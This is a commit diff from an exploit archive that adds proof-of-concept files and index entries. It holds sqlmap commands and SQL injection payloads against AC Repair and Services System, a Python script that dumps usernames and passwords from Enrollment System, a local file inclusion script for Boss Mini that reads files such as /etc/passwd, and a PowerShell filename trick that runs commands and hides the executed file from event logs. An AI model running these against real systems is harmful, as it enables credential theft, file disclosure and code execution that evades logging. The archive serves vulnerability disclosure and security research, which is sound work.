Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20
---

200
exploits/php/remote/51844.txt Normal file
View file

@ -0,0 +1,200 @@
# Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection
# Date: 27 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
Source Code(/php-acrss/admin/user/manage_user.php):
<?php
if(isset($_GET['id'])){
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
foreach($user->fetch_array() as $k =>$v){
$meta[$k] = $v;
}
}
?>
-> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs
---
Source Code(/php-acrss/classes/Master.php):
function delete_inquiry(){
extract($_POST);
$del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'");
if($del){
$resp['status'] = 'success';
$this->settings->set_flashdata('success'," Inquiry successfully deleted.");
}else{
$resp['status'] = 'failed';
$resp['error'] = $this->conn->error;
}
return json_encode($resp);
}
-> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw
---
Source Code(/php-acrss/classes/Users.php):
$qry = $this->conn->query("UPDATE users set $data where id = {$id}");
if($qry){
$this->settings->set_flashdata('success','User Details successfully updated.');
foreach($_POST as $k => $v){
if($k != 'id'){
if(!empty($data)) $data .=" , ";
if($this->settings->userdata('id') == $id)
$this->settings->set_userdata($k,$v);
}
}
POST /php-acrss/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 943
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77
Connection: close
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"
9
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"
Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"
Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"
cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAUtgvsSwiJifz27g--
-> sqlmap -r ~/Documents/POST-localhost.txt --batch
---
Parameter: MULTIPART id ((custom) POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"
(SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END))
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"
Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"
Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"
cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAUtgvsSwiJifz27g--
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="id"
9 AND (SELECT 7168 FROM (SELECT(SLEEP(5)))pifO)
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="firstname"
Claire
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="middlename"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="lastname"
Blake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="username"
cblake
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="type"
2
------WebKitFormBoundaryAUtgvsSwiJifz27g
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAUtgvsSwiJifz27g--
---

89
exploits/php/remote/51845.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: Enrollment System v1.0 - SQL Injection
# Date: 27 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: Obi08
# Vendor Homepage: https://github.com/Obi08/Enrollment_System
# Software Link: https://github.com/Obi08/Enrollment_System
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL
-------------------------------------------------------------------------------------------------------------------------------------------
from bs4 import BeautifulSoup
import requests
import urllib3
#The Config class defines three class attributes: BASE_URL, URI, and PAYLOAD.
#BASE_URL is set to the string "http://localhost/enrollment_system".
#URI is set to the string "/get_subject.php".
#PAYLOAD is set to the string "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -".
class Config:
BASE_URL = "http://localhost/enrollment_system"
URI = '/get_subject.php'
PAYLOAD = "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -"
urllib3.disable_warnings()
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
#This code defines a function called exploit_sqli that exploits a SQL injection vulnerability in a given URL. It takes in a requests.Session object and a Config object as parameters. The function constructs a URL using the BASE_URL and URI properties from the Config object, and creates a dictionary of parameters with a key of 'keyword' and a value of the PAYLOAD property from the Config object.
#The function then tries to make a request using the make_request function and returns the response text if successful. If an exception is raised during the request, it prints an error message and returns an empty string.
def exploit_sqli(session: requests.Session, config: Config) -> str:
"""
Exploits SQL injection vulnerability in the given URL.
Args:
session (requests.Session): The session object to use for making the request.
config (Config): Configuration object containing base URL, URI, and payload.
Returns:
str: The response text from the request.
"""
url = f"{config.BASE_URL}{config.URI}"
params = {'keyword': config.PAYLOAD}
try:
response = make_request(session, url, params)
return response.text
except requests.RequestException as e:
print(f"Request failed: {e}")
return ""
#This code defines a function called make_request that takes in a requests.Session object, a URL string, and a dictionary of parameters. It makes a POST request using the provided session and parameters, and returns the response object. The function has type hints indicating the types of the arguments and the return value.
def make_request(session: requests.Session, url: str, params: dict) -> requests.Response:
"""
Make a POST request with error handling.
Args:
session (requests.Session): The session object to use for making the request.
url (str): The URL to send the request to.
params (dict): The parameters to include in the request.
Returns:
requests.Response: The response object.
"""
return session.post(url, data=params, verify=False, proxies=proxies)
#This code snippet defines a function called parse_html that takes a string parameter response_text. It uses the BeautifulSoup library to parse the HTML in response_text and extract specific data from it. It finds all <tr> elements in the HTML, skips the header row, and then iterates over the remaining rows. For each row, it finds all <td> elements and extracts the text content from the second and third column. Finally, it prints a formatted string that includes the extracted data.
def parse_html(response_text: str):
soup = BeautifulSoup(response_text, 'html.parser')
rows = soup.find_all('tr')[1:] # Skip the header row
for row in rows:
columns = row.find_all('td')
if columns:
subject_code = columns[1].text.strip()
subject_description = columns[2].text.strip()
print(f"User_Type::Username::Password == {subject_code}")
if __name__ == "__main__":
# file deepcode ignore MissingClose: <please specify a reason of ignoring this>
session = requests.Session()
response = exploit_sqli(session, Config)
if response:
parse_html(response)

57
exploits/php/webapps/51848.py Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643
'''
_____ _ _____
/ __ \ | | / ___|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
__/ |
|___/
'''
from requests import post
from urllib.parse import quote
from argparse import ArgumentParser
try:
parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
parser.add_argument('--domain', required=True, help='Application domain')
parser.add_argument('--file', required=True, help='Local file')
args = parser.parse_args()
host = args.domain
file = args.file
url = '{}/boss/servlet/document'.format(host)
file2 = quote(file, safe='')
headers = {
'Host': host,
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
}
data = {
'path': file2
}
try:
req = post(url, headers=headers, data=data, verify=False)
if req.status_code == 200:
print(req.text)
except Exception as e:
print('Error in {}'.format(e))
except Exception as e:
print('Error in {}'.format(e))

131
exploits/windows_x86-64/local/51843.txt Normal file
View file

@ -0,0 +1,131 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Windows PowerShell
Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.
[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass
[CVE Reference]
N/A
[Security Issue]
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that is until now.
[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.
Take the following three test cases using Defender API which takes a specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"
1) Double quotes OK
"Test;saps DOOM;.xml"
2) Single quotes FAILS
'Test;saps DOOM;.xml'
3) Single quotes BYPASS
'Test&DOOM;.xml'
PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'
Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here
and that it also excludes the .EXE portion in that filename.
[PS Event Log Bypass]
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.
Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)
C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.
[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=25
HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682
[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5
Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.
Defender Anti-Malware API:
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'
Call ping cmd using double "&":
C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5
Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'
We have options:
A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'
[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

21
files_exploits.csv
View file

@ -3622,6 +3622,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,,2020-11-19,2020-11-19,0,CVE-2020-25988,,,,,
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision-PoC.py
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/65f7f29ef395d2b6faad91b2a3d62078539a98de/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
51854,exploits/hardware/remote/51854.py,"GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
51851,exploits/hardware/remote/51851.py,"GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
51852,exploits/hardware/remote/51852.py,"GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit",2024-03-03,cyberaz0r,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
21983,exploits/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",remote,hardware,,2002-11-04,2012-10-14,1,,,,,,https://www.securityfocus.com/bid/6100/info
48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,,2020-10-27,2020-10-27,0,,,,,,
1333,exploits/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",remote,hardware,80,2005-11-19,,1,OSVDB-20981;CVE-2005-3757,"Metasploit Framework (MSF)",,,,
@ -3745,6 +3748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19555,exploits/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)",1998-03-17,Rootshell,remote,hardware,,1998-03-17,2012-07-03,1,CVE-1999-0060;OSVDB-1112,,,,,http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html
4797,exploits/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",remote,hardware,,2007-12-26,,1,OSVDB-39726;CVE-2007-6638,,,,,
43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,,2018-01-17,2018-01-17,0,CVE-2018-5726;CVE-2018-5725;CVE-2018-5724;CVE-2018-5723,,,,,
51850,exploits/hardware/remote/51850.txt,"Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)",2024-03-03,"Alok kumar",remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
40120,exploits/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,remote,hardware,,2016-07-18,2016-12-09,0,CVE-2016-3989;CVE-2016-3962,,,,,https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,,2016-10-20,2016-10-27,0,CVE-2013-4863;CVE-2016-6255,,,,,
45040,exploits/hardware/remote/45040.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials",2018-07-17,LiquidWorm,remote,hardware,,2018-07-17,2018-07-17,0,,,,,,
@ -3860,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36504,exploits/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection (Metasploit)",2015-03-26,"Patrick Pellegrino",remote,hardware,,2015-03-26,2015-03-26,0,CVE-2014-7910;OSVDB-112004;CVE-2014-7227;CVE-2014-7196;CVE-2014-7169;CVE-2014-62771;CVE-2014-6271;CVE-2014-3671;CVE-2014-3659,"Metasploit Framework (MSF)",,,,https://github.com/d3vpp/metasploit-modules
42587,exploits/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,remote,hardware,9251,2017-08-29,2017-08-29,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/4c285c0129feb6b8fd90d7283f14f0c2ba22e5ab/modules/exploits/linux/misc/qnap_transcode_server.rb
46506,exploits/hardware/remote/46506.rb,"QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)",2019-03-07,AkkuS,remote,hardware,,2019-03-07,2019-03-07,0,,"Metasploit Framework (MSF)",,,,
51855,exploits/hardware/remote/51855.txt,"R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure",2024-03-03,LiquidWorm,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Remote Command Execution (Metasploit)",2013-09-24,Metasploit,remote,hardware,,2013-09-24,2013-09-24,1,OSVDB-90221,"Metasploit Framework (MSF)",,,,
43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,,2018-01-24,2018-01-26,0,CVE-2018-5997,,,,,
18291,exploits/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS)",2011-12-30,cheffner,remote,hardware,,2011-12-30,2011-12-30,0,OSVDB-78282;CVE-2011-5053,,reaver-1.1.tar.gz,,,
@ -3956,6 +3961,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
51732,exploits/hardware/remote/51732.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
51731,exploits/hardware/remote/51731.py,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Credentials Extraction",2023-10-09,LiquidWorm,remote,hardware,,2023-10-09,2023-10-09,0,,,,,,
51853,exploits/hardware/remote/51853.py,"TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution",2024-03-03,LiquidWorm,remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
@ -3968,6 +3974,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51192,exploits/hardware/remote/51192.py,"TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Tobias Müller",remote,hardware,,2023-04-01,2023-04-01,0,CVE-2022-48194,,,,,
46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80,2019-04-09,2019-04-09,0,CVE-2019-6989,,,,,
48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware,,2020-11-05,2020-11-05,0,CVE-2017-13772,,,,,
51846,exploits/hardware/remote/51846.c,"TPC-110W - Missing Authentication for Critical Function",2024-03-03,"Amirhossein Bahramizadeh",remote,hardware,,2024-03-03,2024-03-03,0,,,,,,
34184,exploits/hardware/remote/34184.txt,"Trend Micro Interscan Web Security Virtual Appliance - Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",remote,hardware,,2010-06-14,2014-07-28,1,,,,,,https://www.securityfocus.com/bid/41072/info
40619,exploits/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection",2016-10-21,"Hacker Fantastic",remote,hardware,,2016-10-21,2018-01-22,0,CVE-2014-6271,,,,,https://github.com/HackerFantastic/Public/blob/777a32d7277e778386e650632fdd9643f0d812ac/exploits/trendmicro_IWSVA_shellshock.py
36680,exploits/hardware/remote/36680.txt,"Trendnet Camera (Multiple Products) - Remote Security Bypass",2012-02-10,console-cowboys,remote,hardware,,2012-02-10,2015-04-09,1,OSVDB-78965,,,,,https://www.securityfocus.com/bid/51922/info
@ -10338,6 +10345,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,,
32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,,
@ -11777,6 +11785,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49799,exploits/multiple/webapps/49799.py,"DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS)",2021-04-23,nu11secur1ty,webapps,multiple,,2021-04-23,2021-04-23,0,CVE-2021-3318,,,,,
12715,exploits/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,webapps,multiple,,2010-05-23,,1,OSVDB-65291;CVE-2010-2099;OSVDB-65243,,,,,
11964,exploits/multiple/webapps/11964.pl,"Easy-Clanpage 2.1 - SQL Injection",2010-03-30,"Easy Laster",webapps,multiple,,2010-03-29,,1,CVE-2008-1425;OSVDB-43334,,,,,
51856,exploits/multiple/webapps/51856.py,"Easywall 0.3.1 - Authenticated Remote Command Execution",2024-03-03,"Melvin Mejia",webapps,multiple,,2024-03-03,2024-03-03,0,,,,,,
14104,exploits/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",webapps,multiple,,2010-06-29,2010-06-29,0,OSVDB-65087;CVE-2010-5029,,,,,http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_ecomat_cms.html
49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,,
49151,exploits/multiple/webapps/49151.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF",2020-12-02,"Hardik Solanki",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@ -11968,6 +11977,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46404,exploits/multiple/webapps/46404.py,"M/Monit 3.7.2 - Privilege Escalation",2019-02-18,"Dolev Farhi",webapps,multiple,,2019-02-18,2019-02-18,0,,,,,http://www.exploit-db.commmonit-3.7.2-linux-x86.tar.gz,
49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
51847,exploits/multiple/webapps/51847.txt,"Magento ver. 2.4.6 - XSLT Server Side Injection",2024-03-03,tmrswrr,webapps,multiple,,2024-03-03,2024-03-03,0,,,,,,
50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",2022-06-27,Vulnz,webapps,multiple,,2022-06-27,2022-06-27,0,,,,,,
9714,exploits/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",webapps,multiple,,2009-10-17,,1,OSVDB-58288;CVE-2009-3333,,,,,
